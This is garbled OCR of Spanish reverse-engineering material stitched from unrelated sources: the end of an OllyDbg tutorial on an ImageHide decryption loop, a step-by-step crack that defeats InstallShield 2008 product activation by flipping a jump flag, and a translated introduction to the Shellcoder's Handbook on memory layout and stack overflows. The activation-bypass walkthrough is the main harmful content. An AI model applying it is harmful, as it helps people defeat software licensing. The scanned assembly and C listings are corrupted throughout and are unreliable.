Enter Passw'ord 
'rubial 


Pulsamos <OK>. Volvemos a Olly y vamos traceando a base de F8 con cuidadito y vemos que después 
de este CALL, vuelve nuestro texto desencriptado: 


MOU EAX, DWORD PTR SS: CEBP-4] 
MOV EAX, DWORD PTR DS: [EAX+30C] 


1814, (ASCII "HouDiNi”) 


mulo oa 


SCII "HouDiNi”) 


Así que otra pasadita entrando esta vez con F7 en ese CALL y nos encontramos este bucle chiquitín que 
es el que se encarga de devolver esa porquería encriptada a su apariencia original: 


BB4C1101|]. SBEC MOU EBP, ESP 


BB4C1103||.. 8304 F4 ADD ESP, -6c 

BB4C11D6|].. 53 PUSH EBX 

BB4C11D7|| . 894D F4 MOU [LOCAL.3], ECX 
ABB4C11DA||.. 8955 F8 MOV [LOCAL.2], EDX 
BB4C11DO|f.. 8945 FC MOV [LOCAL.11, EAX 
BB4C1I1EO|].. 8BSS F4 MOV EDX, [LOCAL.3] 
BB4C11E3|].. 8B45 FS MOV EAX, [LOCAL.2] 

004C11E6 ES ÉSF7FFFF CALL ImageHid. 6040950 
BB4C Ni. 8B45 F4 MOU EAX, [LOCAL.3] 

an4C . 2EBBb MOV EAX, DWORD PTR DS: CEAXI 
on4C1iFO||: ES ABS6F4FF  |CALL ImágeHid.004048A0 
an4C 5. 59 PUSH EAX 

BBACI1F6I|. 8B45 F4 MOU EAX, [LOCAL.3] 

o04C11F9 |. ES F238F4FF  |CALL ImageHid.004D4AFO 
an4C . 50 PUSH _EAX 

Bn4C . 8B45 F4 MOV EAX, [LOCAL.31 
ou4ci202||. ES E938F4FF | CALL ImaseHid.004B4AFO 
BB4C1207|]. SBDO MOU EDxX, ERX 

aB4C1209||.. 8B45 FC MOU EAX, [LOCAL. 1] 
BB4C120CI]. S9 POP ECX 

BB4C120D01|. $SBIS MOU EBX, DWORD PTR DS: CEAX] 
0B4C120 . FF53 50 CALL _NEAR DWORD PTR DS: [EBX+50] 
BB4C1212|f.. SB POP EBX 

BB4C 31). SBES MOU ESP, EBP 

BB4C Si. 5D POP EBP 

Bn4C E E Cc3 


Bueno, pues ahí tenemos el código que desencripta. El problema es la password. Si por algún casual la 
sabemos, entonces no hay más que implementar también esto en el programilla Anti-ImageHide para 
que si lo que nos devuelve, no hay Dios que lo entienda, podamos transformarlo en algo legible. 


En caso de no conocer la password, se podría intentar un ataque por Fuerza Bruta, aunque la cosa está 
chunga si no conocemos ni la longitud de la clave. 


En fin, hasta aquí hemos llegado. Espero que a alguno le parezca de interés todo esto y a ver si alguien 
se anima a hacer algún otro tuto sobre este tema. 
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DESPEDIDA 
Bueno, espero que os hayáis divertido y sobre todo que hayáis aprendido cosas de utilidad. 


Si tenéis algún comentario, encontráis algún error (que muy bien puede haberlo), o simplemente queréis 
charlar sobre el arte del crackeo, esta es mi dirección: 


houdinicrkGOgmail.com 


Hasta el próximo tuto... 


> gg 
Instalador creado con installshield 2008 Professional. 


Installshield 2008 Professional DEMO 


22 Programa 
¿4 Versión 


> / Herramientas Ollydbg 


ee Cracker Noukeys 


Bueno, espero que este pequeño tutorial le sirva a mucha gente. Os expongo los 
antecedentes. 


He descargado la ultima versión de installshield de la página oficial, después he 
utilizado su sistema de claves para proteger una instalación y tener algo con lo que jugar 
O. El resultado es los sorprendentemente fácil que resulta crackear este tipo de 
protección. Pero bueno, manos a la obra, que esto esta cracked en menos de 3 min. 


Lo primero que hacemos, como siempre, es cargar nuestra víctima en Olly. 


Sr Empry dr Ur uuuun 
3210 


FST 4920 Cond 1808 Er: 
FCW 627F Prec NEAR,53 Ma: 
¡04 byte ptr ds:[ebx],902 

¡04 byte ptr ds:[ebx+1],0C 

est ox, eox 


Compressed code? 


Quick statistical test of module 'nLite-1_' reports that ¡ts code section ¡is either compressed, encrypted, or contains large amount of embedded data. 
Results of code analysis can be very unreliable or simply wrong. Do you want to continue analysis? 


[EA 
106 ecx,dword 

104 dword ptr 

106 ecx,nLite-1_.00417131 
104 dword ptr ss: lesp+4],ecx 
¡Op ecx 


wsh ear 

104 eax,nLite-1_.0041702D 
wsh dword ptr ds: leax+8] 
10, 23%, dword ptr ds:leax+C] 


Mmm, empacado, vemos a ver si podemos continuar y convivir con el packer, es más 
fácil que centrarse en quitarlo O 


| | Terminated 


Murió el proceso Y 


Bueno, ¿desde cuando ha sido esto motivo de preocupación? Jejeje, desde nunca O. 
Pues nada, a utilizar la opción de atach que trae nuestro maravilloso Olly. 


Nota: 


Bueno, en este punto del tutorial, todos tenemos nuestro Olly con el proceso atacheado 
y parado, como en la siguiente imagen: 


File view Debug Plugins Options Window Help 


ax] » lu] + 1]Ejm]t/w)n/c] /]x]B[r].-. s] 


nop 
nop 
nop 


nop 
mov_eax,dword ptr ss: lesp+4] 
E] 
:Al 180009001 
le] 


mov edi,dword ptr ss:[esp+C] 
mov edx,duord ptr ss:[esp+8l 
mov duord ptr ds:Ledk], 

mou duord ptr ds:[edi+4],edi 
or edi,edi 


or ecr,FFFFFFFF 
Hor saña 

repne sóas byte ptr estledil 
not eox 

emp ecu, OFFFF 


mou ecu, OFFFF 
mou word ptr de: [edx+21, cx 
dec ecx 

mou uord ptr de: led], cx 
poppsdi 


nop 
nop 

nop 

nop 

nop 

push edi 

mou edi,dword ptr ss:[esp+C] 
mov edu,dword ptr ss:[esp+8] 
mou duord ptr bea 

mov duord ptr di+41, edi 
or edi,edi 


or _eox, FFFFFFFF 
Hor eak,eax 


Ton ntdll-DbsBreakPolnt 


Command 15] 


[Alached process paused al nidl DEgBreakPomt [A [Paused—— 


Pulsamos [F9] para que continúe el proceso, y vamos a meter un número de serie, por 
ejemplo 989898 (... que original ...) a ver que nos dice. 


En InstallShield Wizard 


Welcome to 989898 
The InstallShield Wizard will help you activate 989898 


MEE InstallShield Wizard 


applicatia 


Q Please ensure that you have entered the Response Code correctly (error 901), 


2814 3900 8722 4320 0707 0297 2921 6188 6217 2301 7912 0432 0841 5506 7415 5690 
3108 1513 5986 4991 2452 


Activation Response Code: 
989595 
Feedback | Privacy Policy | Help 


| < Atrás Jl Siguiente > | Cancelar ] 


Bueno, parece que este número de serie no le ha gustado al programa, y nos ha devuelto 
un mensaje de error. Bueno, ahora llegar a la zona caliente es muy muy fácil. 
Simplemente, pausamos el programa [F12] y luego [Ctrl. + F9] hasta que veamos Hill 
Return como en la imagen 


FCALL to WaitMessage from USER32.7/D3ER1F 


to USER32.77D2688A from USER32.77D2E895 


| Till return 


Si nos fijamos en la pila, el proceso está en “WaitMessage”. O digamos que esta 
esperando una acción para procesarla. Pues esa acción va a ser la pulsación del botón 
aceptar. Una vez pulsado vemos que estamos parados en User32. 


CPU - main thread, module USER32 


Fr dword 55 ss: [ebp+10],ebx 


Vamos a llegar a la zona caliente mediante los returns, es decir [Ctrl. + F9] y si lo 
hacemos bien vemos que llegamos a esta zona, dentro del módulo principal del 
programa 


ush ear 
call duord ptr ds: [<LUSERS2.LoadStringA! USER32.LoadStringA 
lea ecx,dword ptr ds: ledi-1] 
Sie ta 
eN dword 89 ES 
add edi,edi 
2 edi 
POP ecx 
mov dword ptr ss: [ebp-41,e3x 
test e£ax,eax 
she eoK 
mov eax,dword ptr ss: [ebp-41] 
mov dword ptr ss: [ebp+C1], ear 
Hor edi,edi 
test dword 443 cae co" 
Feb word Ea A 
ein esi 
mov edi, ear 
POP ecx 
test os 
movzx ebx,word ptr ss: [ebp+10] 
mov eax,dword ptr ds: [CA7D18] 
push esi 
push edi 
push ebx 
mov ea, dword ptr ds: [eax+8] 
ush ear 
call duord ptr ds: [<£USERS2.LoadStringAl USER32.LoadStringA 
lea ecx,dword ptr ds: [lesi-1] 
SU short Act ivat i. BOCISBC? 
Pei edi 
add esi,esi 
uso esi 
mov edi, ear 
POP ecx 
test edi,edi 
BSD ecK 
Hor > 
mov dword ptr s<s:[ebp+151,edi 
push dword ptr ss: [ebp+14] 
push dword ptr ss: [ebp+10] 
push dword ptr ss: [ebp+C] 
ush dword ptr ss: [ebp+8] 
USER32.MessageBoxA 
push dword ptr ss: [ebp-4] 


Bueno, cualquiera que lleve 5 min. depurando, sabe que es esto, la carga y posterior 
muestra del mensaje, pues un poco antes, vamos a llegar al salto mágico del instalador, 
ejecutamos el ret y... un poquito más arriba... 


E > =s; 


lea “erivar dae ss: [ebp-41 


push dword ptr ss: [ebp-8] 
mov esi,eax 


mov eax,dword ptr ds: [CASO3B] 


Mmmm, GetActivationManager .... un call y un salto ¿??? Mmm, que pasa si forzamos 
la cosa un poco¿?¿?¿? 


Paramos en el j¡nz, cambiamos la flan Z, y el salto no se ejecuta, luego [F9] y.... 


Y InstallShield Wizard 


Welcome to 989898 
The Installshield Wizard will help you activate 989898 


Thank you, The activation for 989898 is complete. 


You will not need to activate this product again, 


Feedback | Privacy Policy | Help 


Finalizar 


utilidad y le saquéis partido. 
Un abrazo de vuestro amigo noukeys 


Noukeys 2.008 


Bienvenido a la parte I de la segunda edición del manual del Shellcoder: Hallar 

y explotar agujeros de seguridad. Esta parte es una introducción al descubrimiento y 
explotación de la vulnerabilidad. Está organizado de manera que le permitirá aprender 
la explotación con ejemplos ficticios de estructuras de código creadas específicamente 
para este libro como ayuda en el proceso de aprendizaje, así como en la vida real y en 
vulnerabilidades todavía por encontrar. 


Aprenderá los detalles de la explotación bajo Linux o bajo un procesador 32-bit de 
INTEL (1432 o x86).El descubrimiento y explotación de vulnerabilidades en 
Linux/TA32 es de lo más fácil y la mayor parte se comprenden rápidamente. Por qué 
hemos escogido en primer término Linux y no 1432. Linux es fácil de comprender 
desde el punto de vista de un hacker ya que el sistema operativo tiene una estructura 
interna sólida y confiable, para trabajar con él, en cuanto a explotaciones. 

Cuando tenga una comprensión sólida de estos conceptos y haya trabajado con el 
código de ejemplo, avanzará hacia una vulnerabilidad cada vez más difícil descu- 
briendo habilidades y maneras de explotación en las partes subsecuentes. En el capítulo 
2 trabajaremos con stack buffer overflows, en el 3 introducción al shellcoding, en el 4 
format Strings overflows y finalmente la parte 5 con técnicas de Hacking con heap 
basado en buffer overflow para la plataforma de Linux. Una vez comprendidas estas 
partes, estará en el buen camino para comprender el desarrollo de vulnerabilidades y su 
explotación. 


Antes de empezar 


Este capítulo examina los conceptos que usted necesita comprender a fin de dar sen- 
tido al resto de este libro. El material cubierto aquí es introductorio y esperamos que ya 
sea conocido por usted. Este capítulo no es de ningún modo un intento para cubrir todo 
lo que necesite saber; más bien, debe servir como apuntes de información para otros 
capítulos. 

Debe leer de cabo a rabo este capítulo como refresco. Si encuentra conceptos que no 
comprenda, sugerimos que los marque como áreas en las que necesita hacer mayor 
hincapié. Tome el tiempo necesario en aprender sobre estos conceptos antes de 
aventurarse en los capítulos posteriores. 

Encontrará muchas de las muestras de código y los fragmentos de código de este 

libro en el sitio Web del manual del Shellcoder ( http://www.wiley.com/go 
/shellcodershandbook); puede copiar y pegar estas muestras en su editor de texto 
favorito para ahorrar tiempo al trabajar en los ejemplos. 


Conceptos básicos 


Para comprender el contenido de este libro, necesita una buena comprensión de 
lenguajes de computadora, sistemas operativos, y arquitecturas. Si no comprende cómo 
funciona algo, es difícil detectar que es lo que no funciona bien. Manejar bien las 
computadoras es bueno para descubrir y explotar agujeros de seguridad. 

Antes de empezar a comprender los conceptos, debe ser capaz de hablar en su 
lenguaje. Necesitará saber unas cuantas definiciones, O términos, que son parte de 


el lenguaje vernáculo de los investigadores de seguridad de modo que pueda aplicar 
mejor los conceptos de este libro: 


Vulnerability (n.): un defecto en una protección del sistema que pueda generar un 
ataque utilizando el sistema de una forma que no es la que se diseñó. Esta puede atacar a 
la disponibilidad del sistema, elevar los privilegios de acceso a un nivel no predeter- 
minado, completo control del sistema por un usuario desautorizado, y muchas otras 
posibilidades. También conocido con el nombre de “security hold” o “security bug”. 


Exploit (v.): Aprovecharse de una vulnerabilidad de modo que el objetivo sea que el 
sistema reaccione de distinta forma al diseñado. 


Exploit (n.): Herramienta, conjunto de instrucciones, o código que se utiliza para tomar 
la ventaja de una vulnerabilidad. También conocido con el nombre de “Proof of 
Concept (POC). 


Oday (n.): Un “exploit” para una vulnerabilidad que ha no sido públicamente 
descubierta. A veces acostumbra a referirse a la propia vulnerabilidad. 


Fuzzer (n.): Herramienta o aplicación que atenta contra todo, o una amplia gama de 
valores de entrada inesperados a un sistema. El propósito de un fuzzer es determi- 
nar si existe un bug en el sistema, que más tarde será explotado sin tener por entero 
como objetivo el funcionamiento del sistema interno. 


Gestión de memoria 


Para usar este libro, necesitará comprender la gestión de memoria moderna, espe- 
cíficamente para la arquitectura de INTEL, 32 bit (1432). Linux en 1432 es cubierto 
exclusivamente en la primera sección de este libro y usado en los capítulos 
introductorios. Necesitará comprender cómo la memoria es manejada, porque la mayor 
parte de los agujeros de seguridad descritos en este libro se realizan sobrescribiendo o 
desbordando una porción de memoria en otra. 


INSTRUCCIONES Y DATOS 

Una computadora moderna no hace ninguna distinción real entre instrucciones y datos. 
Si un procesador se puede alimentar con instrucciones cuando debe estar viendo datos, 
ello puede por fortuna ejecutar las instrucciones pasadas. Esta característica hace 
posible la explotación del sistema. Este libro le enseñará cómo insertar las instrucciones 
cuando el diseño del sistema espera datos. Usará también el concepto de desborda- 
miento para sobrescribir las instrucciones con sus propias diseñadas. La meta es tomar 
el control de la ejecución. 


Cuando un programa es ejecutado, se exhibe organizado de la siguiente manera— 
distintos elementos del programa son colocados en la memoria. En primer lugar, el 
sistema Operativo crea un espacio de direcciones en que el programa correrá. Este 
espacio de direcciones incluye las instrucciones de programa reales así como cualquiera 
de los datos requeridos. 

Después, la información del archivo ejecutable del programa es cargada en el nuevo 
espacio de direcciones creado. En este existen tres tipos de segmentos: .text, .bss y 


.data. El segmento de .text es colocado como sólo para lectura, mientras que .data y .bss 
se pueden escribir. Los segmentos de .bss y .data son reservados para las variables 
globales. El segmento .data contiene los datos estáticos inicializados y el segmento .bss 
contiene los datos no inicializados. Por último el segmento, .text, tiene las instrucciones 
del programa. 

Finalmente, la pila (stack) y el almacenamiento de pila (heap) son inicializados. El stack 
es una estructura de datos, más específicamente una estructura de datos de último en 
entrar, primero en salir (LIFO), lo que significa que el dato puesto más reciente o 
empujado (push), en la pila es el próximo elemento para ser utilizado o sacado (pop), 
del stack. Una estructura de datos LIFO es ideal para almacenar información transitoria, 
o información que no necesita ser guardada durante un periodo de tiempo largo. El stack 
almacena las variables locales, información referente a llamadas de función, y otra 
información utilizada para dejar completamente limpia la pila después de que una 
función o procedimiento es llamado. 

Otra característica importante del stack es que crece hacia abajo del espacio de 
direcciones: cada dato que se añade al stack, este es añadido cada vez con un valor de 
dirección inferior. 

El heap es otra estructura de datos que acostumbra a tener la información de programa, 
más específicamente, las variables dinámicas. El heap es (crudamente) una estructura de 
datos (FIFO) el primero en entrar, el primero en salir. Los datos son entrados y sacados 
del heap de la misma manera que se construye. El heap crea el espacio de direcciones 
hacia arriba: Tal como los datos son añadidos al heap, este se incrementa con una 
dirección de valor más alto, como se muestra en el diagrama de espacio de memoria 
siguiente. 


''Direcciones inferiores (0x08000000) 
Librerías divididas 

text 

.bss 

Heap ( crece d) 

Stack ( crece ?) 

Puntero env| 

Argc 

y Direcciones superiores (Oxbfffffff) 


La gestión de memoria presentada en esta sección debe comprenderse más 
profundamente y a un nivel mucho más detallado para entenderla, es muy importante 
para aplicarlo al contenido de este libro. Lea la primera mitad de capítulo 15 para saber 
dónde aprender más sobre la gestión de memoria. Puede hacer una visita también en 
http://linux-mm.org/ para información más detallada en gestión de memoria en Linux. 
Los conceptos comprendidos de gestión de memoria le ayudarán a comprender mejor la 
manipulación del lenguaje de programación que usará por ejemplo—ensamblador. 


Assembly (ensamblador) 


Para comprender gran parte de este libro se requiere el conocimiento del lenguaje 
ensamblador específico para 1A32. Gran parte del proceso del descubrimiento de un bug 
está supeditado a interpretar y comprender ensamblador, y muchos de estos libros se 
enfocan en ensamblador del procesador de INTEL 32-bit. Explotar los agujeros de 


seguridad requiere una firme comprensión del lenguaje ensamblador, ya que la mayor 
parte de exploits requerirán que programe o modifique el código ensamblado existente. 
Otros sistemas aparte del 1432 son importantes, pero pueden ser algo más difíciles para 
explotar, este libro también trata bugs y exploits descubiertos en otras familias de 
procesadores. Si su interés es la investigación de seguridad en otras plataformas, es 
importante tener una fuerte comprensión del ensamblado específico a la arquitectura 
escogida. 

Si no está bien versado o no tiene ninguna experiencia en ensamblado, primero 
necesitará aprender los sistemas numéricos (específicamente hexadecimal), tamaños de 
datos y representaciones de números con signo. Estos conceptos de ingeniería de 
computadores pueden encontrarse en la mayor parte de los libros de arquitectura de 
ordenador a nivel universitario. 


Registros 


La comprensión de cómo los registros trabajan en un procesador 1A32 y cómo ellos son 
manipulados vía ensamblador es esencial para el desarrollo de vulnerabilidades y 
explotaciones. Los registros pueden ser accedidos, leídos, y cambiados con ensamblado. 
Los registros son memoria, normalmente conectados directamente al sistema de 
circuitos de razonamiento de ejecución. Son responsables de las manipulaciones las 
cuales permiten funcionar al moderno computador, y se pueden manipular con las 
instrucciones de ensamblado. 

De nivel alto, los registros se pueden agrupar en cuatro categorías: 


De uso general 
Segmento 
Control 

Otro 


Los registros de propósito general se utilizan para ejecutar un rango de operaciones 
matemáticas comunes. Estos incluyen registros tales como EAX, EBX y ECX para el 
1A32 y pueden utilizarse para almacenar datos y direcciones, offsets de direcciones, y 
ejecutan los cálculos de las funciones, y muchas otras cosas. 

Un registro de propósito general a tener muy en cuenta es el registro de puntero de stack 
extendido indicador (ESP) o simplemente el puntero de stack. ESP apunta a la dirección 
de memoria donde la siguiente operación del stack tendrá lugar. A fin de comprender 
los stack overflows del siguiente capítulo debe comprender completamente cómo ESP 
es usado en las instrucciones de ensamblado comunes y el efecto que producen en los 
datos almacenados en el stack. 

La clase siguiente de registro, que nos interesa es el registro de segmento. A diferencia 
de otros registros en un procesador 1432, los registros de segmento son de 16 bit ( los 
otros registros son de 32 bits). Los registros de segmento tales como CS, DS, y SS, son 
utilizados para recordar los segmentos y para permitir la compatibilidad de antiguas 
aplicaciones del6-bit. 

Los registros de control se utilizan para controlar la función del procesador. El más 
importante de estos registros para el 1432 es el puntero de instrucción extendido (EIP) o 
simplemente el indicador de instrucción. EIP que contiene la dirección de la próxima 
instrucción máquina a ejecutarse. Naturalmente, si quiere controlar el flujo de ejecución 
de un programa, que es el propósito de todas las partes de este libro, es importante tener 
la habilidad para acceder y cambiar el valor almacenado en el registro de EIP. 


Los registros de la categoría “otros” son registros simplemente extraños que no se 
ajustan perfectamente a las primeras tres categorías. Unos de estos, es el registro 
extendido de banderas (EFLAGS), que comprende algunos registros de un bit los cuales 
se utilizan para almacenar los resultados de diferentes verificaciones ejecutadas por el 
procesador. 

Una vez que tenga una comprensión sólida de los registros, puede pasar a la 
programación en ensamblado. 


Reconocer C y C++ 
Construcción de código en ensamblado 


La familia de lenguajes de programación (C, C++, CF ) es una de las más usadas, dentro 
de la gran cantidad de ellos, como lenguaje de programación. C es claramente el más 
popular idioma para programar aplicaciones para Windows y servidor de UNIX, los 
cuales son buenos objetivos para el desarrollo de vulnerabilidades. Por estas razones, 
una comprensión sólida de C es primordial. 

Conjuntamente a una amplia comprensión de C, deberá ser capaz de comprender 

cómo el código C compilado se traduce en ensamblado. Comprendiendo cómo se 
representan en ensamblado las variables, punteros, funciones y distribución de memoria 
de C, hacerlo hará que el contenido de este libro sea mucho más fácil de comprender. 
Tomemos cierto código construido en C y C++ y veamos como se verá en ensamblado. 
Si asimila perfectamente estos ejemplos, estará listo para avanzar con el resto del libro. 
Declararemos un número entero en C++, entonces usaremos ese mismo número entero, 
para contar: 


Int number; 
. . . más código. .. 
number++; 


Esto puede traducirse en ensamblado: 


number dw 0 

. . más código... 
mov eax,number 
inc eax 

mov number,eax 


Usamos la instrucción define word (DW) para definir un valor para nuestro entero, 
number. Después pasamos el valor al registro EAX, incrementamos el valor en uno al 
registro EAX y pasamos este valor entero a number. 

Miremos una simple declaración 1f en C++: 


Int number; 
1f (number< 0 ) 


( 


. . más código. .. 


) 


Ahora, miremos la misma declaración en ensamblado: 


number dw 0 
mov eax,number 
or eax,eax 

jge label 

<no> 

label :<yes > 


Lo que estamos haciendo de nuevo es definir un valor para number con la instrucción 
DW. Entonces pasamos el valor almacenado en number a EAX, luego saltamos a label 
si number es mayor que o igual a cero con un salto si mayor que o igual a (JGE). 

Aquí vemos otro ejemplo, usando un conjunto(array): 


Int array[4]; 
. . más código... 
Array [2] =9; 


Aquí hemos declarado un conjunto, array, y habilitamos un elemento del array igual a 9. 
En ensamblado será: 


array dw 0,0,0,0 

. . más código... 
mov ebx,2 

mov array [ebx], 9 


En este ejemplo, declaramos un conjunto y utilizamos el registro EBX para pasar los 
valores del conjunto. 


Por último, echemos una mirada a un ejemplo más complicado. El código se muestra 
cómo una simple función de C y en ensamblado. Si puede comprender fácilmente este 
ejemplo, probablemente esté listo para avanzar al capítulo siguiente. 

A 

int triangle (int width, in height)[ 

int array[5] = (0,1,2,3,4); 

int area; 

area = width * height/2; 

return (area); 


) 


Aquí está la misma función, pero en ensamblado. Lo que sigue está sacado del 
depurador gdb. Gdb es un proyecto de depurador GNU; puede leer más sobre ello en 
http://www.gnu.org/software/gdb/documentation/. Vea si puede casar el ensamblador 
con el código de c: 


0x8048430 <triangle>: push %ebp 

0x8048431 <triangle+1>: mov  %Zesp, %ebp 
0x8048433 <triangle+3>: push %edi 

0x8048434 <triangle+4>: push %Zesi 

0x8048435 <triangle+5>: sub  $0x30,%esp 
0x8048438 <triangle+8>: lea  Oxffffffds(Jebp), Jedi 


0x804843b <triangle+11>: 
0x8048440 <triangle+16>: 
0x8048441 <triangle+17>: 
0x8048446 <triangle+22>: 
0x8048448 <triangle+24>: 
0x804844b <triangle+27>: 
0x804844d <triangle+29>: 
0x8048451 <triangle+33>: 
0x8048453 <triangle+35>: 
0x8048456 <triangle+38>: 
0x8048459 <triangle+41>: 
0x804845c <triangle+44>: 
0x804845e <triangle+46>: 
0x8048461 <triangle+49>: 
0x8048464 <triangle+52>: 
0x8048466 <triangle+54>: 
0x8048469 <triangle+57>: 
0x804846a <triangle+58>: 


0x804846b <triangle+59> 


0x804846c <triangle+60>: 


mov  $0x8049508, %esi 


cld 
mov  $0x30,%esp 
repz movsl  %ds:( %esi), %es:( Jedi) 


mov  0x8(%ebp),%eax 

mov  %eax,%edx 

imul Oxc(%ebp), %edx 

mov  %edx,%eax 

sar $Ox1f%eax 

shr  $0x1f,%eax 

lea (%eax, %edx, 1), Zoeax 
sar Zoeax 

mov  Jeax,Oxffffftd4(%ebp) 


mov  Oxffffftd4(J%ebp), Joeax 
mov  Yeax,%eax 

add  $0x30,%esp 

pop %esi 

pop %Zedi 

pop %ebp 

ret 


Lo principal que hace la función es multiplicar dos números, observe la instrucción imul 
hacia la mitad. También observe las primeras instrucciones guardando EBP, y restando 
de ESP. La resta crea espacio en el stack para las variables locales de las funciones. Hay 
que observar también que la función retorna su resultado al registro EAX. 


Conclusión 


Este capítulo introduce ciertos conceptos básicos que necesita saber como fin para 
comprender el resto de este libro. Debe utilizar el tiempo necesario repasando los 
conceptos que se apuntaron en este capítulo. Si encuentra que no tiene suficiente 
conocimiento en lenguaje ensamblador y C o C++, puede necesitar más preparación a 
fin de conseguir sacar el jugo completo a los siguients capítulos. 


Capítulo 2 
Excesos de pila (Stack O werflow) 


Los stack basados en excesos de buffer, han sido históricamente uno de los más 
populares y mejores métodos comprendidos de explotar software. De los cientos, de 
documentos que han sido escritos sobre técnicas de stack owerflow en todas las 
arquitecturas más populares. Uno de los más frecuentemente mencionado y 
probablemente el primer documento público sobre stack owerflow, es “Smashing the 
Stack for Fun and Profit” escrito por Aleph One”s. Escrito en 1996 y publicado en la 
revista Phrack, el documento explicó por primera vez de una manera clara y concisa 
cómo las vulnerabilidades de stack owerflow son posibles y como pueden explotarse. 
Recomendadmos que lea el documento disponible en http://insecure.org/stf/ 
smashstack.html. 


Aleph One no inventó el stack owerflow; el conocimiento y explotación de 

los stack owerflow era conocido hacía más de una década antes de que el documento 
“Smashing the stack” saliera a la luz. Las vulnerabilidades de stack owerflow 
teoricamente se conocen desde hace unos 25 las cuales se han ido explotando con el 
lenguaje C. Aunque estas vulnerabilidades son probablemente los más comprendidas y 
con mayor documentación pública, las vulnerabilidades de stack owerflow, hoy en día 
son las más frecuentes en el software. Verifique su lista de noticias de seguridad 
favorita; es probable que se esté redactando un informe de una nuevo stack owerflow 
mientras esté leyendo este capítulo. 


Buffers 


Un buffer es definido como un espacio limitado y continuo de la memoria. La mayoría 
de los buffers en C son un conjunto (array). El material que se explica en este capítulo 
está enfocado en los “arrays”. 

Los stack owerflow son posibles porque no existe ninguna comprobación inherente de 
los límites de los buffers, en el lenguaje C o C++. En otros términos, el idioma C y sus 
derivados no tienen una función incorporada para asegurar que los datos que serán 
copiados en un buffer no serán más grandes que los que el buffer pueda soportar. 

Por lo tanto, si la persona que diseña el programa, haya explícitamente codificado 

el programa para verificar la entrada de un tamaño exagerado de datos, es posible que 
los datos puedan llenar un buffer y si esos datos son lo bastante grandes, para continuar 
escribiendo mas allá del límite del buffer, como verá en este capítulo Será entonces 
cuando las cosas anormales empezarán a suceder, sobrescribiendo más allá del límite 
del buffer. Observe este ejemplo extremadamente simple que ilustra cómo C no tiene 
ningún límite-comprobación en los buffers. ( recuerde, puede encontrar este y muchos 
otros fragmentos de código y programas en el Shellcoder?s Handbook Web Site, 
http://www .wiley.com/go/shellcodershandbook.) 


ttinclude <stdio.h> 

ftinclude <string.h> 

int main () 

( 

int array[5] = (1,2, 3, 4, 5); 
printf(“%dwn”, array[5] ); 

) 


En este ejemplo, hemos creado un array en C. El conjunto, llamado array, es de 

cinco elementos longitud. Hemos hecho una equivocación de programador C novato, 
olvidamos que un conjunto de tamaño cinco empieza en el elemento cero, array[0], 

y acaba con el elemento cuatro, array[4]. Probamos de leer lo que pensamos que era el 
quinto elemento del conjunto, pero estamos realmente leyendo más allá del conjunto, en 


el “sexto” elemento. El compilador gCC no saca ningún error, pero cuando ejecutamos 
este código, conseguimos unos resultados inesperados: 


shellcoders Odebian:-/chapter_2$ cc buffer.c 
shellcoders Odebian:-/chapter_2$./a.out 
134513712 


Este ejemplo muestra cómo fácilmente se puede leer lo que sigue después del final de 
un buffer; C no proporciona ninguna protección incorporada. ¿Qué conclusión sacamos 
de escribir después del final de un buffer? Que esto será posible también hacerlo 
intencionadamente Tratemos de escribir más allá del buffer y veamos lo que sucede: 


int main [) 
( 
int array[5]; 
int 1; 
for G1=0;1<=255; i++) 
( 
array[1] = 10; 
) 
) 


De nuevo, nuestro compilador no nos da ninguna advertencia o error. Pero, cuando 
ejecutamos este programa, explota: 


shellcoders Odebian:-/chapter_2$ cc buffer2.c 
shellcoders Odebian:-/chapter_2$./a.out 
Segmentation fail ( core dumped >) 


Como podría saber ya por experiencia, cuando un programador crea un buffer el cual 
potencialmente puede ser desbordado, se compila y ejecuta, el programa a menudo 
estalla o no funciona como se esperaba. El programador entonces repasa el código hasta 
hallar donde se produce el error y arreglar el bug. Echemos un vistazo al volcado del 


nucleo en gdb: 


shellcoders Odebian:-/chapter_2$ gdb -q -c core 
Program terminated with signal 11, Segmentation fault. 
F0 0x0000000a in ?? () 

(gdb) 


Interesante, vemos que el programa se estuvo ejecutando en la dirección Ox0000000a o 
10 en decimal cuando este explotó. Lo veremos detalladamente más tarde en este 
capítulo. 

¿Así, qué ocurriría si la entrada de usuario es copiada en un buffer? O, ¿qué ocurriría si 
un programa espera la entrada de otro programa que puede ser emulada por una 
persona, tal como TCP/IP network-aware client? . 

Si el programador diseña el código para que copie la entrada de usuario en un buffer, es 
posible que un usuario ponga intencionadamente más entradas en un buffer de las que él 
pueda tomar. Esto puede tener varias consecuencias diferentes, una explotar el 
programa para forzarlo a ejecutar instrucciones suministradas por el usuario. Éstas son 
las situaciones que a nosotros nos conciernen principalmente, pero antes de que 
consigamos controlar la ejecución, primero necesitamos intentar desbordar un buffer 
almacenado en el stack realizándolo desde una perspectiva de gestión de memoria. 


El Stack 


Como se explicó en el capítulo 1, el stack es una estructura de datos LIFO. Muy 
parecido a la pila de platos de una cafetería, el último elemento colocado en la pila es el 
primer elemento que se debe quitar. El límite del stack es definido por el registro del 
puntero extendido del stack (ESP) el cual apunta a la parte de arriba del stack. 


Las instrucciones específicas del stack, PUSH y POP, utilizan a ESP para saber donde 
está situado el stack en la memoria. En la mayor parte de las arquitecturas, 
especialmente 1A32 en el cual está enfocado este capítulo, ESP apunta a la última 
dirección usada por el stack. En otras ejecuciones, éste apunta a la primera dirección 
libre. 

Los datos son pasados a la pila usando la instrucción PUSH; y son cogidos del stack 
usando la instrucción POP. Estas instrucciones están altamente perfeccionadas y son 
eficientes para mover los datos del stack. Ejecutamos dos instrucciones PUSH y vea 
cómo el stack cambia: 


push 1 
push addr var 


Estas dos instrucciones primero colocarán el valor 1 en el stack y luego colocarán la 
dirección de la variable VAR encima de él. El stack se parecerá al mostrado en Fig- 
ura 2 - 1. 

Address | Value 


643410h | Address of variable VAR +*— ESP points to this address 


643414h 11 


643418h| 


Figura 2-1: pasando valores a la pila 


El registro ESP apuntará a la parte superior del stack, dirección 643410h. Los valores 
serán pasados al stack en el orden de ejecución, así pues el valor 1 es pasado el 
primero, y luego la dirección de variable VAR. Cuando se ejecute una instrucción 
PUSH, el valor de ESP será disminuido en cuatro, y el dword es escrito en la nueva 
dirección almacenada en el registro ESP. 

Una vez que hayamos pasado algo en el stack, inevitablemente, querremos recuperarlo 
esto se realiza con la instrucción POP. Usando el mismo ejemplo, recuperaremos los 
datos y direcciones del stack: 


pop eax 
pop ebx 


En primer lugar, cargamos el valor de la parte superior del stack (donde ESP está 
apuntando) en EAX. Después, repetimos la instrucción POP, para copiar los datos en 
